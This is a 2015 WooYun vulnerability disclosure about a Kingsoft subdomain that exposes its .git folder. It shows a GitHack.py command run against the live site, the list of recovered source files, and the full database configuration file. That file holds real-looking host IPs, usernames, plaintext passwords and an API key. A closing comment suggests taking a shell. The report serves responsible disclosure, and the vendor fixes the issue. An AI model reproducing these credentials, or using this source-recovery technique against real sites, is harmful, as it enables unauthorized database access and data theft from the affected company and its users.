缺陷编号:WooYun-2015-0123857
漏洞标题:金山某分站git漏洞泄露数据库配置文件
相关厂商:金山毒霸
漏洞作者:JiuShao
提交时间:2015-07-01 11:23
公开时间:2015-08-15 11:34
漏洞类型:敏感信息泄露
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-15: 细节向公众公开
利用李姐姐的神器以还原本地
http://popo.wan.ijinshan.com/.git/config
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
C:\Python27>python 1/GitHack.py http://popo.wan.ijinshan.com/.git/<br> [+] Download and parse index file ...<br> [OK] .gitignore<br> [OK] Conf/config.php<br> [OK] Lib/Action/GlAction.class.php<br> [OK] Lib/Action/ImportAction.class.php<br> [OK] Lib/Action/RejectAction.class.php<br> [OK] Lib/Action/PopoAction.class.php<br> [OK] Lib/Helper/PopoHelper.class.php<br> [OK] Lib/Action/TestAction.class.php<br> [OK] Lib/Helper/ImportHelper.class.php<br> [OK] Lib/Helper/GlHelper.class.php<br> [OK] ThinkPHP/Extend/Library/ORG/Net/IpLocation_Bootstrap.class.php<br> [OK] ThinkPHP/Extend/Library/ORG/Net/IpLocation.class.php<br> [OK] ThinkPHP/Lib/Driver/Cache/CacheMemcache.class.php<br> [OK] favicon.ico<br> [OK] cli.php<br> [OK] index.php<br> [OK] start.sh<br> [OK] ThinkPHP/Extend/Library/ORG/Net/UTFWry.dat |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 |
<?php<br> return array(<br> // url<br> 'URL_MODEL' => 2,<br> 'URL_CASE_INSENSITIVE' => true,// autoload config<br> 'APP_AUTOLOAD_PATH' => '@.Common,@.Util,@.Helper',// db<br> 'DB_TYPE' => 'mysql',<br> 'DB_HOST' => '10.10.0.177',<br> 'DB_NAME' => 'popo_wan',<br> 'DB_USER' => 'popo_wan',<br> 'DB_PWD' => 'UtyuGBY72DXM',<br> 'DB_PREFIX' => '','DB_KSAFE' => array(<br> 'db_type' => 'mysql',<br> 'db_user' => 'dbreader',<br> 'db_pwd' => 'king+5688',<br> 'db_host' => '119.147.146.239',<br> 'db_port' => '3306',<br> 'db_name' => 'infoc_ksafe'<br> ),'DB_KVIP' => array(<br> 'db_type' => 'mysql',<br> 'db_user' => 'dbreader',<br> 'db_pwd' => 'king+5688',<br> 'db_host' => '119.147.146.119',<br> 'db_port' => '3306',<br> 'db_name' => 'infoc_kvip'<br> ),'DB_WEIKAN' => array(<br> 'db_type' => 'mysql',<br> 'db_user' => 'gim_usr',<br> 'db_pwd' => 'CNpPGY2jn187Sx67FhqppxRmNjh25WOC',<br> 'db_host' => '114.112.68.238',<br> 'db_port' => '3306',<br> 'db_name' => 'GIM_DW'<br> ),// cache<br> 'DATA_CACHE_TYPE' => 'Memcache',<br> 'MEMCACHE_HOST' => 'tcp://192.168.2.172:11211',<br> 'DATA_CACHE_TIME' => '0',// log<br> 'LOG_RECORD' => true,<br> 'LOG_LEVEL' => 'INFO',<br> 'LOG_TYPE' => 3,// app<br> 'API_KEY' => 'ZhQneW7P','URL_ROUTER_ON' => true,<br> 'URL_ROUTE_RULES' => array(<br> 'api/reject/index' => 'Reject/index',<br> 'api/reject/set' => 'Reject/set',<br> 'api/reject/cancel' => 'Reject/cancel'<br> ),'SESSION_AUTO_START' => false,<br> );<br> ?> |
修复吧
危害等级:中
漏洞Rank:8
确认时间:2015-07-0111:32
收到,立刻处理。
2015-07-01:已经修复完毕。
不如拿个shell
原文连接
的情况下转载,若非则不得使用我方内容。